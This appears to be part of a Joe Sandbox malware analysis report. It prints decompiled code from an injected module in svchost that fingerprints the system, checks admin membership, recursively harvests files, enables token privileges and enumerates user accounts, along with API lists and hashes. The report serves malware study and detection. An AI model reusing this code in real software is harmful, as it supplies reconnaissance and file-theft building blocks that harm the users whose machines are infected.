                                                                                                                                        0x0bc02829
                                                                                                                                        0x0bc02839
                                                                                                                                        0x0bc02839
                                                                                                                                        0x0bc02843
                                                                                                                                        0x0bc0284a
                                                                                                                                        0x0bc0284a
                                                                                                                                        0x0bc02856
                                                                                                                                        0x0bc02873
                                                                                                                                        0x0bc02879
                                                                                                                                        0x0bc0287b
                                                                                                                                        0x0bc02881
                                                                                                                                        0x0bc0288d
                                                                                                                                        0x0bc0288f
                                                                                                                                        0x0bc02897
                                                                                                                                        0x0bc0289f
                                                                                                                                        0x0bc028a4
                                                                                                                                        0x0bc028a4
                                                                                                                                        0x0bc02897
                                                                                                                                        0x0bc028b6
                                                                                                                                        0x0bc028b8
                                                                                                                                        0x0bc028ba
                                                                                                                                        0x0bc028c3
                                                                                                                                        0x0bc028c5
                                                                                                                                        0x0bc028cd
                                                                                                                                        0x0bc028d0
                                                                                                                                        0x0bc028d5
                                                                                                                                        0x0bc028d5
                                                                                                                                        0x0bc028cd
                                                                                                                                        0x0bc028f0
                                                                                                                                        0x0bc028f6
                                                                                                                                        0x0bc028f9
                                                                                                                                        0x0bc028ff
                                                                                                                                        0x0bc02905
                                                                                                                                        0x0bc02907
                                                                                                                                        0x0bc0290d
                                                                                                                                        0x0bc0291b
                                                                                                                                        0x0bc02921
                                                                                                                                        0x0bc02923
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc0292b
                                                                                                                                        0x0bc02931
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc02909
                                                                                                                                        0x0bc02909
                                                                                                                                        0x0bc02909
                                                                                                                                        0x0bc02937
                                                                                                                                        0x0bc02937
                                                                                                                                        0x0bc0293c
                                                                                                                                        0x0bc02947
                                                                                                                                        0x0bc0294c
                                                                                                                                        0x0bc02950
                                                                                                                                        0x0bc02998
                                                                                                                                        0x0bc02998
                                                                                                                                        0x0bc02998
                                                                                                                                        0x0bc029a7
                                                                                                                                        0x0bc0295b
                                                                                                                                        0x0bc0295b
                                                                                                                                        0x0bc02968
                                                                                                                                        0x0bc0296d
                                                                                                                                        0x0bc02974
                                                                                                                                        0x0bc02983
                                                                                                                                        0x0bc02990
                                                                                                                                        0x0bc02995
                                                                                                                                        0x0bc029ae
                                                                                                                                        0x0bc029b9
                                                                                                                                        0x0bc029bf
                                                                                                                                        0x0bc029c5
                                                                                                                                        0x0bc029cd
                                                                                                                                        0x0bc029ea
                                                                                                                                        0x0bc029f1
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc029cf
                                                                                                                                        0x0bc029d5
                                                                                                                                        0x0bc029db
                                                                                                                                        0x0bc029dd
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc029df
                                                                                                                                        0x0bc029e6
                                                                                                                                        0x0bc029f7
                                                                                                                                        0x0bc029f9
                                                                                                                                        0x0bc02a02
                                                                                                                                        0x0bc02a08
                                                                                                                                        0x0bc02a14
                                                                                                                                        0x0bc02a36
                                                                                                                                        0x0bc02a36
                                                                                                                                        0x0bc029cd
                                                                                                                                        0x0bc02907

                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,?,00000000,0000009C,?,?,1.00), ref: 0BC027A1
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000080), ref: 0BC027FF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0BC02817
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0BC02823
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 0BC02832
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000480), ref: 0BC02856
                                                                                                                                        • GetLocaleInfoA.KERNELBASE(00000400,00001002,00000000,000003FF), ref: 0BC02879
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,00000000,000003FF), ref: 0BC028B6
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0BC028FF
                                                                                                                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,BEEF0001), ref: 0BC0291B
                                                                                                                                        • FreeSid.ADVAPI32(00000000), ref: 0BC0292B
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0BC029C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0BC029D5
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0BC029E6
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 0BC029F1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info$AddressProc$HandleLocaleModuleSystem$AllocAllocateCheckCurrentFreeInitializeLocalMembershipNativeProcessTokenVersion
                                                                                                                                        • String ID: 1.00$GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                                                                        • API String ID: 3827863693-3117966753
                                                                                                                                        • Opcode ID: f1eeebdcece5386905d72581e2e131025df84167071f7fe4044e6e55e74db658
                                                                                                                                        • Instruction ID: 0a7a2abbfc3859f8002cc6b7e1ddce59b3b4d5538729bf6102fa864256d08afd
                                                                                                                                        • Opcode Fuzzy Hash: f1eeebdcece5386905d72581e2e131025df84167071f7fe4044e6e55e74db658
                                                                                                                                        • Instruction Fuzzy Hash: 2F717471A753289FEB20AB64DC89F9E77B8EF04640F0181A5A649A61C0DF709F84DF61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 0BC01FD3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 132filestringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 677 bc01fd3-bc0200e 678 bc02014-bc02017 677->678 679 bc02156-bc02174 call bc08d3d call bc09fdc 677->679 678->679 681 bc0201d-bc0202a call bc08f95 678->681 687 bc02031-bc02062 call bc08ee2 call bc08d5e FindFirstFileA 681->687 688 bc0202c 681->688 687->679 693 bc02068 687->693 688->687 694 bc0206d-bc02072 693->694 695 bc02074-bc02088 lstrcmpiA 694->695 696 bc020df-bc020e4 694->696 699 bc02135-bc02146 FindNextFileA 695->699 700 bc0208e-bc0209c lstrcmpiA 695->700 697 bc020e6-bc020f7 StrStrIA 696->697 698 bc020f9-bc0211e call bc08ee2 call bc08f32 696->698 697->698 697->699 711 bc02120 call bc02b0b 698->711 712 bc02126 call bc01f01 698->712 699->694 701 bc0214c-bc02150 FindClose 699->701 700->699 703 bc020a2-bc020aa call bc08f95 700->703 701->679 709 bc020b0 703->709 710 bc020ac-bc020ae 703->710 713 bc020b2-bc020d5 call bc08ee2 call bc08f32 call bc01fd3 709->713 710->713 716 bc02124 711->716 718 bc0212b 712->718 725 bc020da-bc020dd 713->725 716->718 719 bc0212e-bc02134 call bc08d3d 718->719 719->699 725->719
                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                        			E0BC01FD3(void* __edx, long _a4, char* _a8, char* _a12, intOrPtr _a16, char* _a20) {
				signed int _v8;
				char _v288;
				void* _v336;
				struct _WIN32_FIND_DATAA _v344;
				char* _v348;
				signed int _v352;
				CHAR* _v364;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				void* _t42;
				void* _t44;
				CHAR* _t45;
				void* _t50;
				void* _t54;
				int _t58;
				char* _t60;
				void* _t65;
				char* _t66;
				void* _t73;
				CHAR* _t74;
				void* _t85;
				void* _t87;
				char* _t91;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t85 = __edx;
				_t95 = (_t93 & 0xfffffff8) - 0x15c;
				_t37 =  *0xbc10000; // 0xbb40e64e
				_v8 = _t37 ^ _t95;
				_v352 = _v352 & 0x00000000;
				_v344.dwFileAttributes = _a4;
				_t91 = _a8;
				_v344.ftCreationTime = _a12;
				_v348 = _a20;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t44 = E0BC08F95(_t91);
					_push(_t91);
					_t45 = "\\*.*";
					if(_t44 != 0) {
						_t45 = "*.*";
					}
					_v352 = E0BC08EE2(_t45);
					E0BC08D5E( &(_v344.ftLastAccessTime),  &(_v344.ftLastAccessTime), 0, 0x140);
					_t50 = FindFirstFileA(_v364,  &_v344); // executed
					_v348 = _t50;
					if(_t50 != 0xffffffff) {
						_t74 = "\\";
						do {
							if((_v344.ftLastAccessTime.dwFileAttributes & 0x00000010) == 0) {
								__eflags = _v344.ftCreationTime;
								if(_v344.ftCreationTime == 0) {
									L15:
									_t54 = E0BC08F32(E0BC08EE2(_t74, _t91),  &_v288);
									__eflags = _v348;
									_push(_a16);
									_t88 = _t54;
									_push(_t54);
									_push(_v344.dwFileAttributes);
									if(__eflags == 0) {
										E0BC01F01(__eflags);
									} else {
										_v348();
									}
									_t95 = _t95 + 0xc;
									goto L19;
								} else {
									_t60 = StrStrIA( &_v288, _v344.ftCreationTime); // executed
									__eflags = _t60;
									if(_t60 != 0) {
										goto L15;
									}
								}
							} else {
								if(lstrcmpiA(".",  &_v288) != 0 && lstrcmpiA("..",  &_v288) != 0) {
									_t65 = E0BC08F95(_t91);
									_push(_t91);
									if(_t65 != 0) {
										_t66 = 0;
										__eflags = 0;
									} else {
										_t66 = _t74;
									}
									_t88 = E0BC08F32(E0BC08EE2(_t66),  &_v288);
									E0BC01FD3(_t85, _v344.dwFileAttributes, _t68, _v344.ftCreationTime, _a16, _v348); // executed
									_t95 = _t95 + 0x1c;
									L19:
									E0BC08D3D(_t88);
								}
							}
							_t58 = FindNextFileA(_v336,  &(_v344.ftLastAccessTime)); // executed
						} while (_t58 != 0);
						FindClose(_v336); // executed
					}
				}
				_t42 = E0BC08D3D(_v352);
				_pop(_t87);
				_pop(_t92);
				_pop(_t73);
				return E0BC09FDC(_t42, _t73, _v8 ^ _t95, _t85, _t87, _t92);
			}































                                                                                                                                        0x0bc01fd3
                                                                                                                                        0x0bc01fd9
                                                                                                                                        0x0bc01fdf
                                                                                                                                        0x0bc01fe6
                                                                                                                                        0x0bc01ff0
                                                                                                                                        0x0bc01ff5
                                                                                                                                        0x0bc01ffd
                                                                                                                                        0x0bc02000
                                                                                                                                        0x0bc02008
                                                                                                                                        0x0bc0200e
                                                                                                                                        0x0bc0201d
                                                                                                                                        0x0bc02024
                                                                                                                                        0x0bc02025
                                                                                                                                        0x0bc0202a
                                                                                                                                        0x0bc0202c
                                                                                                                                        0x0bc0202c
                                                                                                                                        0x0bc0203c
                                                                                                                                        0x0bc02047
                                                                                                                                        0x0bc02055
                                                                                                                                        0x0bc0205b
                                                                                                                                        0x0bc02062
                                                                                                                                        0x0bc02068
                                                                                                                                        0x0bc0206d
                                                                                                                                        0x0bc02072
                                                                                                                                        0x0bc020df
                                                                                                                                        0x0bc020e4
                                                                                                                                        0x0bc020f9
                                                                                                                                        0x0bc02108
                                                                                                                                        0x0bc0210d
                                                                                                                                        0x0bc02114
                                                                                                                                        0x0bc02117
                                                                                                                                        0x0bc02119
                                                                                                                                        0x0bc0211a
                                                                                                                                        0x0bc0211e
                                                                                                                                        0x0bc02126
                                                                                                                                        0x0bc02120
                                                                                                                                        0x0bc02120
                                                                                                                                        0x0bc02120
                                                                                                                                        0x0bc0212b
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc020e6
                                                                                                                                        0x0bc020ef
                                                                                                                                        0x0bc020f5
                                                                                                                                        0x0bc020f7
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc020f7
                                                                                                                                        0x0bc02074
                                                                                                                                        0x0bc02088
                                                                                                                                        0x0bc020a2
                                                                                                                                        0x0bc020a7
                                                                                                                                        0x0bc020aa
                                                                                                                                        0x0bc020b0
                                                                                                                                        0x0bc020b0
                                                                                                                                        0x0bc020ac
                                                                                                                                        0x0bc020ac
                                                                                                                                        0x0bc020ac
                                                                                                                                        0x0bc020c7
                                                                                                                                        0x0bc020d5
                                                                                                                                        0x0bc020da
                                                                                                                                        0x0bc0212e
                                                                                                                                        0x0bc0212f
                                                                                                                                        0x0bc02134
                                                                                                                                        0x0bc02088
                                                                                                                                        0x0bc0213e
                                                                                                                                        0x0bc02144
                                                                                                                                        0x0bc02150
                                                                                                                                        0x0bc02150
                                                                                                                                        0x0bc02062
                                                                                                                                        0x0bc0215a
                                                                                                                                        0x0bc02167
                                                                                                                                        0x0bc02168
                                                                                                                                        0x0bc02169
                                                                                                                                        0x0bc02174

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • FindFirstFileA.KERNELBASE(00000140,?,?,00000000,00000140), ref: 0BC02055
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC02084
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC02098
                                                                                                                                        • StrStrIA.KERNELBASE(?,00000000), ref: 0BC020EF
                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0BC0213E
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 0BC02150
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNextlstrlen
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 1112430718-1692270452
                                                                                                                                        • Opcode ID: 67bd23621ae2e30052fe985893bba09b66ec199bb82c577828a6236e56deab4e
                                                                                                                                        • Instruction ID: 6f9fb320e64279f46f72f9f53bdaee50ace9c0ec0fde0a9c19af987d6cab001e
                                                                                                                                        • Opcode Fuzzy Hash: 67bd23621ae2e30052fe985893bba09b66ec199bb82c577828a6236e56deab4e
                                                                                                                                        • Instruction Fuzzy Hash: 764191711383059FD711AF68CC49A6BBBE9EF88354F044929FA94C61D0EF31DA44DBA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.07%

                                                                                                                                        Function 0BC03D27, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 94filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                        			E0BC03D27(char* __ebx, void* __edx, intOrPtr _a4) {
				signed int _v12;
				struct _WIN32_FIND_DATAA _v336;
				void* _v340;
				signed int _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				void* __edi;
				void* __esi;
				signed int _t28;
				signed int _t38;
				void* _t42;
				int _t48;
				char* _t56;
				void* _t61;
				signed int _t64;
				void* _t65;
				void* _t66;

				_t61 = __edx;
				_t56 = __ebx;
				_t28 =  *0xbc10000; // 0xbb40e64e
				_v12 = _t28 ^ _t64;
				_v344 = _v344 & 0x00000000;
				_v348 = _a4;
				if(__ebx == 0) {
					L9:
					return E0BC09FDC(E0BC08D3D(_v344), _t56, _v12 ^ _t64, _t61, _t62, 0xbeef0000);
				}
				_t68 =  *__ebx;
				if( *__ebx == 0) {
					goto L9;
				}
				_t62 = "\\sm.dat";
				_v340 = E0BC08EE2("\\sm.dat", __ebx);
				E0BC01F01(_t68, _v348, _t34, 0xbeef0000); // executed
				E0BC08D3D(_v340);
				_t38 = E0BC08EE2("\\*.*", __ebx);
				_t66 = _t65 + 0x18;
				_v344 = _t38;
				E0BC08D5E( &_v336,  &_v336, 0, 0x140);
				_t42 = FindFirstFileA(_v344,  &_v336); // executed
				_v340 = _t42;
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v336.dwFileAttributes & 0x00000010) != 0 && lstrcmpiA(".",  &(_v336.cFileName)) != 0) {
						_t48 = lstrcmpiA("..",  &(_v336.cFileName));
						_t72 = _t48;
						if(_t48 != 0) {
							_v352 = E0BC08F32(E0BC08F32(E0BC08EE2("\\", _t56),  &(_v336.cFileName)), _t62);
							E0BC01F01(_t72, _v348, _t52, 0xbeef0000);
							E0BC08D3D(_v352);
							_t66 = _t66 + 0x24;
						}
					}
				} while (FindNextFileA(_v340,  &_v336) != 0);
				FindClose(_v340);
				goto L9;
			}




















                                                                                                                                        0x0bc03d27
                                                                                                                                        0x0bc03d27
                                                                                                                                        0x0bc03d30
                                                                                                                                        0x0bc03d37
                                                                                                                                        0x0bc03d3d
                                                                                                                                        0x0bc03d46
                                                                                                                                        0x0bc03d4e
                                                                                                                                        0x0bc03e72
                                                                                                                                        0x0bc03e8b
                                                                                                                                        0x0bc03e8b
                                                                                                                                        0x0bc03d54
                                                                                                                                        0x0bc03d57
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03d5d
                                                                                                                                        0x0bc03d77
                                                                                                                                        0x0bc03d7d
                                                                                                                                        0x0bc03d88
                                                                                                                                        0x0bc03d93
                                                                                                                                        0x0bc03d98
                                                                                                                                        0x0bc03da0
                                                                                                                                        0x0bc03daf
                                                                                                                                        0x0bc03dc1
                                                                                                                                        0x0bc03dc7
                                                                                                                                        0x0bc03dd0
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc03dd6
                                                                                                                                        0x0bc03dd6
                                                                                                                                        0x0bc03ddd
                                                                                                                                        0x0bc03e01
                                                                                                                                        0x0bc03e07
                                                                                                                                        0x0bc03e09
                                                                                                                                        0x0bc03e32
                                                                                                                                        0x0bc03e38
                                                                                                                                        0x0bc03e43
                                                                                                                                        0x0bc03e48
                                                                                                                                        0x0bc03e48
                                                                                                                                        0x0bc03e09
                                                                                                                                        0x0bc03e5e
                                                                                                                                        0x0bc03e6c
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08D3D: LocalFree.KERNELBASE(00000000,?,0BC08E77,?), ref: 0BC08D49
                                                                                                                                        • FindFirstFileA.KERNELBASE(00000000,?,?,00000000,00000140), ref: 0BC03DC1
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7EC,?), ref: 0BC03DEB
                                                                                                                                        • lstrcmpiA.KERNEL32(0BC0D7F0,?), ref: 0BC03E01
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        • FindNextFileA.KERNEL32(?,00000010), ref: 0BC03E58
                                                                                                                                        • FindClose.KERNEL32(?), ref: 0BC03E6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Find$Filelstrcatlstrcmpilstrcpy$CloseFirstFreeLocalNext
                                                                                                                                        • String ID: \*.*$\sm.dat
                                                                                                                                        • API String ID: 549939916-826034721
                                                                                                                                        • Opcode ID: 75f24a8f05f328a6f0117f52438f7abd1f42c0a44663c673c88f5ee7956add2a
                                                                                                                                        • Instruction ID: 8ca248bf010daae5389a851f858f91de07f66b769d5e133f1244a2b03301aecc
                                                                                                                                        • Opcode Fuzzy Hash: 75f24a8f05f328a6f0117f52438f7abd1f42c0a44663c673c88f5ee7956add2a
                                                                                                                                        • Instruction Fuzzy Hash: 2B316F70930258AFDB21AF65CC49BEABBB9EF59301F0441E4A518E62D0DF30CB84DE64
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Function 0BC09B51, Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                        			E0BC09B51(CHAR* _a4) {
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct _TOKEN_PRIVILEGES _v28;
				void* _v32;
				struct _LUID _v40;
				void* __edi;
				void* __esi;
				signed int _t17;
				int _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				int _t36;
				signed int _t38;

				_t17 =  *0xbc10000; // 0xbb40e64e
				_v12 = _t17 ^ _t38;
				_t36 = 0;
				_v32 = 0;
				if(LookupPrivilegeValueA(0, _a4,  &_v40) != 0 && OpenProcessToken(GetCurrentProcess(), 0x20,  &_v32) != 0) {
					_v28.Privileges = _v40.LowPart;
					_v20 = _v40.HighPart;
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_t30 = AdjustTokenPrivileges(_v32, 0,  &_v28, 0x10, 0, 0); // executed
					_t36 = _t30;
				}
				if(_v32 != 0) {
					CloseHandle(_v32);
				}
				return E0BC09FDC(_t36, _t31, _v12 ^ _t38, _t35, _t36, 0);
			}

















                                                                                                                                        0x0bc09b57
                                                                                                                                        0x0bc09b5e
                                                                                                                                        0x0bc09b6e
                                                                                                                                        0x0bc09b70
                                                                                                                                        0x0bc09b7b
                                                                                                                                        0x0bc09b98
                                                                                                                                        0x0bc09ba1
                                                                                                                                        0x0bc09bac
                                                                                                                                        0x0bc09bb3
                                                                                                                                        0x0bc09bba
                                                                                                                                        0x0bc09bc0
                                                                                                                                        0x0bc09bc0
                                                                                                                                        0x0bc09bc5
                                                                                                                                        0x0bc09bca
                                                                                                                                        0x0bc09bca
                                                                                                                                        0x0bc09bdf

                                                                                                                                        APIs
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0BC09B73
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B83
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09B8A
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 0BC09BBA
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0BC01633,0BC0E67C), ref: 0BC09BCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3038321057-0
                                                                                                                                        • Opcode ID: ae6c67f298a57c9c8fd80d6876ff2d1e894e9b81ca9db163a35b5eabfc4901d4
                                                                                                                                        • Instruction ID: 4718ecaabd63b3458028bb7e9f7b3d10ac30c2a42dd234ed6d45263332c31b1d
                                                                                                                                        • Opcode Fuzzy Hash: ae6c67f298a57c9c8fd80d6876ff2d1e894e9b81ca9db163a35b5eabfc4901d4
                                                                                                                                        • Instruction Fuzzy Hash: AF111871E11219AFDB10DFA9D848BEFBBF8EF08754F004519E915E2280DB74DA45CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        Function 0BC01507, Relevance: 4.6, APIs: 3, Instructions: 78memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E0BC01507(void __ecx) {
				char* _v8;
				short* _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _t28;
				void* _t37;
				intOrPtr _t38;
				void _t39;
				short* _t40;
				intOrPtr _t41;
				intOrPtr* _t42;
				void* _t43;

				_t39 = __ecx;
				_t40 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_t28 = NetUserEnum(_t40, 3, 2,  &_v8, 0xffffffff,  &_v16,  &_v24,  &_v20); // executed
					_v28 = _t28;
					if(_t28 == _t40 || _t28 == 0xea) {
						_t42 = _v8;
						if(_t42 == _t40) {
							goto L11;
						}
						_v12 = _t40;
						if(_v16 <= _t40) {
							goto L9;
						}
						while(_t42 != _t40) {
							_t38 = E0BC09BE0(_t39,  *((intOrPtr*)(_t42 + 0x68)), 0xffffffff);
							_t41 = E0BC09BE0(_t39,  *_t42, 0xffffffff);
							_t43 = _t43 + 0x10;
							if(_t41 != 0) {
								_t37 = LocalAlloc(0x40, 0x8c);
								_t39 =  *0xbc10d08; // 0x325a4b0
								 *((intOrPtr*)(_t37 + 8)) = _t38;
								 *((intOrPtr*)(_t37 + 4)) = _t41;
								 *_t37 = _t39;
								 *0xbc10d08 = _t37;
							}
							_t42 = _t42 + 0x74;
							_v12 =  &(_v12[0]);
							_t40 = 0;
							if(_v12 < _v16) {
								continue;
							} else {
								goto L9;
							}
						}
						goto L9;
					} else {
						L9:
						if(_v8 != _t40) {
							NetApiBufferFree(_v8);
							_v8 = _t40;
						}
					}
					L11:
				} while (_v28 == 0xea);
				return 1;
			}

















                                                                                                                                        0x0bc01507
                                                                                                                                        0x0bc01510
                                                                                                                                        0x0bc01512
                                                                                                                                        0x0bc01515
                                                                                                                                        0x0bc01518
                                                                                                                                        0x0bc0151b
                                                                                                                                        0x0bc0151e
                                                                                                                                        0x0bc01535
                                                                                                                                        0x0bc0153b
                                                                                                                                        0x0bc01540
                                                                                                                                        0x0bc01549
                                                                                                                                        0x0bc0154e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01550
                                                                                                                                        0x0bc01556
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc01558
                                                                                                                                        0x0bc01567
                                                                                                                                        0x0bc01573
                                                                                                                                        0x0bc01575
                                                                                                                                        0x0bc0157a
                                                                                                                                        0x0bc01583
                                                                                                                                        0x0bc01589
                                                                                                                                        0x0bc0158f
                                                                                                                                        0x0bc01592
                                                                                                                                        0x0bc01595
                                                                                                                                        0x0bc01597
                                                                                                                                        0x0bc01597
                                                                                                                                        0x0bc0159c
                                                                                                                                        0x0bc0159f
                                                                                                                                        0x0bc015a5
                                                                                                                                        0x0bc015aa
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc015aa
                                                                                                                                        0x00000000
                                                                                                                                        0x0bc015ac
                                                                                                                                        0x0bc015ac
                                                                                                                                        0x0bc015af
                                                                                                                                        0x0bc015b4
                                                                                                                                        0x0bc015ba
                                                                                                                                        0x0bc015ba
                                                                                                                                        0x0bc015af
                                                                                                                                        0x0bc015bd
                                                                                                                                        0x0bc015bd
                                                                                                                                        0x0bc015d1

                                                                                                                                        APIs
                                                                                                                                        • NetUserEnum.NETAPI32(00000000,00000003,00000002,?,000000FF,?,?,?), ref: 0BC01535
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000008C), ref: 0BC01583
                                                                                                                                        • NetApiBufferFree.NETAPI32(?), ref: 0BC015B4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocBufferEnumFreeLocalUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2257117481-0
                                                                                                                                        • Opcode ID: 47e0f255a263482f2ff9512c2089df5c53801e8851eb627a4b9f80c1f0d4e555
                                                                                                                                        • Instruction ID: 2327e2b250b84b2f6b29fa62c6d4a315706a7d855bfc6352afa785814ee55c91
                                                                                                                                        • Opcode Fuzzy Hash: 47e0f255a263482f2ff9512c2089df5c53801e8851eb627a4b9f80c1f0d4e555
                                                                                                                                        • Instruction Fuzzy Hash: 55214F75D20204AFDB11DF99C885AAEFBF8FB84320F644656E565F7290DA709B40CF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.37%

